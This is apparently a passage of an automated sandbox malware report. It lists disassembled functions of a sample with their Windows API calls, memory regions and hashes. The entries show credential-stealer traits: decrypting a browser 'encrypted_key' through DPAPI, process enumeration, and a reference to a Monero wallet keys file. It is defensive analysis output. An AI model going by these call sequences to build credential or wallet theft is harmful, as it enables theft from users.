                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 67d3a094bfe1eb3865729913c5087636fa7a9c28786d85a6bb994fb425e77923
                          • Instruction ID: c03f1337371a99a25bb9bc689ae4438b8132948c8337c97d65723abbfc17dbb0
                          • Opcode Fuzzy Hash: 67d3a094bfe1eb3865729913c5087636fa7a9c28786d85a6bb994fb425e77923
                          • Instruction Fuzzy Hash: 6F313EB6D10209ABCF05EBE4DC85BFEB7B8AB48304F184559E905A7241EB349A04CBA5
                          Function 00398680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003A05B7), ref: 003986CA
                          • Process32First.KERNEL32(?,00000128), ref: 003986DE
                          • Process32Next.KERNEL32(?,00000128), ref: 003986F3
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • CloseHandle.KERNEL32(?), ref: 00398761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                          • Instruction ID: e200a4546d09bac8755ca038740d6f7c8204980b92bf94e79bce064a7257520b
                          • Opcode Fuzzy Hash: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                          • Instruction Fuzzy Hash: CF316B71911618ABCF26DF90DC45FEEBBB8FF45700F104299E10AA61A0DB306A45CFA1
                          Function 00397980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E00,00000000,?), ref: 003979B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003979B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,003A0E00,00000000,?), ref: 003979C4
                          • wsprintfA.USER32 ref: 003979F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                          • Instruction ID: 65e07c739a43ce62a096029178ec7b1534f3d1f637dbffe8b0be45d2fe566de1
                          • Opcode Fuzzy Hash: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                          • Instruction Fuzzy Hash: FA1123B2904518ABCB14DFCADD45FBEBBF8FB4CB15F10421AF605A2280E2395944DBB1
                          Function 0039C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0039C74E
                            • Part of subcall function 0039BF9F: __amsg_exit.LIBCMT ref: 0039BFAF
                          • __getptd.LIBCMT ref: 0039C765
                          • __amsg_exit.LIBCMT ref: 0039C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0039C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                          • Instruction ID: 0b502caa1777659a3f1fa81f0ddd8a4ad97179c9ab0871f1e6befd4b4f78c5f0
                          • Opcode Fuzzy Hash: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                          • Instruction Fuzzy Hash: 27F09A32910A009FEF23BBF8A946B5AB3A0AF00720F255249F405AE2D2DB745D409E96
                          Function 00394F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00394F7A
                          • lstrcat.KERNEL32(?,003A1070), ref: 00394F97
                          • lstrcat.KERNEL32(?,00E392C8), ref: 00394FAB
                          • lstrcat.KERNEL32(?,003A1074), ref: 00394FBD
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                            • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                            • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                            • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                          • Instruction ID: 930e95796e892f7ca87ecfb79f1d3be219c2b881a93a4580ed450fc2723dcc5f
                          • Opcode Fuzzy Hash: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                          • Instruction Fuzzy Hash: C421DA7690020C6BCB55FBB0EC46EEE373CAB65304F004584B64996181EE749ACDCB92